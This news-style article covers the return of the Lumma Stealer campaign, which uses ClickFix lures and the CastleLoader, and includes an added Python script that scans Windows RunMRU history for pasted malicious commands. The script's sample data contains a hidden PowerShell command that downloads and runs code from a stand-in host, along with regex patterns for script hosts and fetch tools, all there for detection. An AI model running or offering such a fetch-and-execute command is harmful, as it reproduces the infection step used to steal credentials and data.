Lumma Stealer is active again and spreading widely through attacks that are difficult to detect. Security researchers are seeing a clear rise in infections in which victims are tricked by deceptive websites into running malicious commands themselves.
According to Ars Technica, this approach, known as ClickFix, is combined with advanced loader malware to complete the infection.
CastleLoader plays an important role in the current campaign. This loader runs exclusively in memory and therefore leaves little trace on the hard drive. This makes it more difficult for traditional security solutions to recognize the threat. The code is also heavily obfuscated, and communication with the controlling infrastructure is flexible. Once CastleLoader is active, Lumma Stealer is brought in as a second phase.
The distribution method is remarkably simple. A fake verification or error message instructs victims to copy a piece of text and paste it into the Windows Run dialog. What looks like an innocent verification step is in fact the launch of malicious code. Researchers point out that this tactic works mainly because users have grown accustomed to technical workarounds and verification steps, which lowers the threshold for following such instructions.
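Because the ClickFix lure relies on the victim typing into the Run dialog, a defender can look for traces of it in Windows' Run history. The following is an added example (not code from the article or from any of the researchers it cites): on Windows, commands entered in the Run dialog are recorded under the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as values named a, b, c, ... (each ending in the two characters "\1") plus an MRUList value giving their order, most recent first. The script parses that layout and flags entries that combine a script host with hiding flags, remote fetches or inline execution, the pattern a pasted "verification" command typically shows. The sample RunMRU contents and the domain verify.example are constructed; the indicator patterns and the threshold of two indicators are the author's own choices, not a published rule.

```python
"""Triage Windows Run-dialog history (RunMRU) for ClickFix-style pastes.

Added example, not from the article. The registry layout assumed here:
  HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
  values a, b, c ... hold commands suffixed with "\\1"; MRUList orders them.
"""
import re
from typing import Dict, List, Tuple

# Indicators a defender would expect in a pasted "verification" command:
# script hosts and flags that hide the window, bypass policy, fetch remote
# content or execute a string in place. (Author's choice of patterns.)
SUSPICIOUS_PATTERNS = {
    "script_host": re.compile(
        r"\b(powershell|pwsh|mshta|wscript|cscript|cmd)(\.exe)?\b", re.I),
    "hidden_or_bypass": re.compile(
        r"-(w(indowstyle)?\s+hidden|nop(rofile)?|ep\s+bypass|executionpolicy\s+bypass)\b",
        re.I),
    "encoded_command": re.compile(
        r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(
        r"(https?://|\biwr\b|invoke-webrequest|downloadstring|\bcurl\b|\bwget\b|\bbitsadmin\b)",
        re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

# Constructed sample mirroring a RunMRU key: two benign entries and one
# ClickFix-style paste. The URL uses the reserved .example domain.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "powershell -w hidden -ep bypass -c \"iex (iwr 'http://verify.example/check.txt')\"\\1",
}


def parse_runmru(values: Dict[str, str]) -> List[str]:
    """Return Run-dialog commands most-recent-first, with the "\\1" suffix stripped."""
    entries = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        entries.append(raw[:-2] if raw.endswith("\\1") else raw)
    return entries


def score_entry(command: str) -> Tuple[int, List[str]]:
    """Count which indicator families match a single command."""
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(command)]
    return len(hits), hits


def triage(values: Dict[str, str], threshold: int = 2) -> List[dict]:
    """Return entries that match at least `threshold` indicator families."""
    findings = []
    for cmd in parse_runmru(values):
        score, hits = score_entry(cmd)
        if score >= threshold:
            findings.append({"command": cmd, "score": score, "indicators": hits})
    return findings


def read_live_runmru() -> Dict[str, str]:
    """Read the current user's RunMRU key on Windows; returns {} elsewhere."""
    try:
        import winreg  # only available on Windows
    except ImportError:
        return {}
    values: Dict[str, str] = {}
    try:
        with winreg.OpenKey(
            winreg.HKEY_CURRENT_USER,
            r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU",
        ) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:  # raised when no more values remain
                    break
                values[name] = str(data)
                index += 1
    except OSError:  # key absent or not readable
        return {}
    return values


if __name__ == "__main__":
    # Use the live key when run on Windows, otherwise the constructed sample.
    source = read_live_runmru() or SAMPLE_RUNMRU
    for finding in triage(source):
        print(f"score={finding['score']} indicators={finding['indicators']} :: {finding['command']}")
```

On an endpoint fleet the same check is better expressed as a registry-monitoring rule in the EDR, since RunMRU only captures what was typed into the Run dialog and not what the spawned process did afterwards; the parent-child relationship explorer.exe to powershell.exe with a hidden window is the complementary signal. Organizations that do not need the Run dialog can also remove it with the "Remove Run menu from Start Menu" policy (the NoRun value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer), which removes this particular paste target entirely.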
Once installed, Lumma focuses on collecting sensitive information. This includes stored passwords, browser data, documents, crypto wallet information, and authentication data. System information is also stolen, allowing attackers to profile victims or carry out more targeted follow-up actions. The stolen data can be used for further attacks or resold within criminal networks.
Rapid rebuilding of the criminal network
It is striking how quickly the infrastructure behind the malware has been rebuilt after earlier takedowns by law enforcement. By rotating domains and at times hosting files on legitimate online services, the operators make detection harder and arouse less suspicion.
Lumma appeared on cybercrime forums several years ago as a service model for information theft. Customers could pay to use a ready-made infrastructure to steal data. International actions previously shut down part of that network, but the current resurgence shows that the ecosystem recovers relatively easily.
The return of Lumma underscores that disrupting infrastructure does not automatically end a malware campaign. As long as social engineering remains effective and the technical barriers are low, threat actors can resume their activities. It is therefore crucial for organizations and users to stay alert to unexpected instructions that ask them to perform manual actions on their system.